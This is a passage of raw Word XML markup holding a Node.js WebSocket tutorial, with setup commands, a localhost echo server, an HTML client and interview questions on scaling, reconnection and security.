          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Low Latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ideal for real-time applications where timely data delivery is crucial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C45594C" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How to Implement WebSocket in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7F7E5F" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 1: Set Up a Basic Node.js Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551FBA1C" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Initialize the Project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E5ACB1"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mkdir websocket-demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441EF29E"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cd websocket-demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724E7BF3"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npm init -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F61057" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Install Dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222D0428"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npm install ws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3405464D" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The ws package is a popular WebSocket library for Node.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4966D4A9" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 2: Create a Simple WebSocket Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F92553" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Create a WebSocket Server (server.js):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09904189"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WebSocket = require('ws');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2EE102"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77B0B6D"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wss = new WebSocket.Server({ port: 8080 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76723E9E"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7D9346E"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wss.on('connection', (ws) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BD0B59"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console.log('New client connected');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29690F54"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E7DD39F"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ws.on('message', (message) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C5DE3"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console.log(`Received: ${message}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1AD995"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Echo the received message back to the client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A19F662"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ws.send(`Server: ${message}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710DCB7D"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9447BF6"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3546875"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ws.on('close', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28380D0C"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console.log('Client disconnected');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09595636"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34D08B8"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D545009"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268F5744"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console.log('WebSocket server is running on ws://localhost:8080');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6413980E" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Run the WebSocket Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CCAAD1" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>node server.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C1F3C3" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This starts a WebSocket server on ws://localhost:8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B13F87" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 3: Create a Simple WebSocket Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DF0705" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>You can use a simple HTML file to connect to the WebSocket server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611D10A6" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Create client.html:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26428CBF"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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E3455"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&lt;html lang="en"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCA7C84"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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6217B369"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&lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424AACB8"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&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D0E60F"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&lt;title&gt;WebSocket Client&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A16B7C5"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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5494F71A"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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D88812"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&lt;h1&gt;WebSocket Client&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE8FC66"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&lt;input type="text" id="messageInput" placeholder="Type a message..." /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77279138"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&lt;button id="sendButton"&gt;Send&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FB0C14"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&lt;ul id="messages"&gt;&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110B2320"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734F3D84"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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F7E850"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ws = new WebSocket('ws://localhost:8080');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E982C89"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0EF17E0E"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ws.onopen = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617DA358"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console.log('Connected to the server');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF05304"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAD9772"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797C5D5"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rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ws.onmessage = (event) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248D58EB"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messages = document.getElementById('messages');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D98EF5C"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li = document.createElement('li');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F237AE8"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li.textContent = event.data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2EF1FF"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messages.appendChild(li);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670683B3"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FF74F7A"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4DB0F946"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document.getElementById('sendButton').onclick = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1957D94F"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const input = document.getElementById('messageInput');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A386E3C"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ws.send(input.value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E9D906"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input.value = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4337A43B"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8A4383C"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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0E369A"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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F51A5DC" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258F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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A54C2B0" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Open the HTML file in a browser:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The client will connect to the WebSocket server, and you can send messages back and forth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BDA4A4" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>WebSocket Interview Questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66620516" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When preparing for interviews focused on WebSocket in Node.js, consider these common questions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596A1134" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is a WebSocket and how does it differ from HTTP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5522ED87" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15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WebSocket is a protocol that allows full-duplex communication over a single, long-lived connection between a client and a server. Unlike HTTP, which is request-response based and stateless, WebSocket maintains a persistent connection where both client and server can send messages at any time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FF34A0" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How do you implement WebSocket in Node.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5492BD22" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15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In Node.js, you can implement WebSocket using the ws library. You set up a WebSocket server that listens for client connections, handle messages using event listeners like connection, message, and close, and maintain an open communication channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6EA77B" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are some use cases for WebSockets?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1BE343" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15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Use cases include real-time applications such as chat applications, multiplayer games, live sports updates, stock market dashboards, and collaborative tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EA696B" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How do you handle WebSocket connections in a clustered Node.js environment?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDAECD0" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15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In a clustered environment, where multiple instances of a Node.js server are running, you may use a pub/sub mechanism like Redis to share WebSocket messages between instances, ensuring that all clients receive updates regardless of which server instance they are connected to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBBB138" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How do you handle WebSocket errors and reconnections?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378A7A06" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15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You can handle WebSocket errors using the error event, and implement reconnection logic on the client side to automatically reconnect if the connection is lost. This typically involves setting a retry interval and gradually increasing the wait time between retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5678195C" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How do you scale a WebSocket server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5871CED0" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15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Scaling a WebSocket server involves distributing the load across multiple server instances, using load balancers, and managing state (e.g., active connections) using shared storage or pub/sub systems like Redis. Horizontal scaling and deploying behind a reverse proxy (e.g., Nginx) are common strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2117ED16" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are the security considerations when using WebSockets?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEF3192" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15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Security considerations include validating and sanitizing incoming messages to prevent injection attacks, using WSS (WebSocket Secure) to encrypt data, implementing authentication and authorization for WebSocket connections, and protecting against DoS attacks by limiting the number of connections and rate-limiting messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6CC35D" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
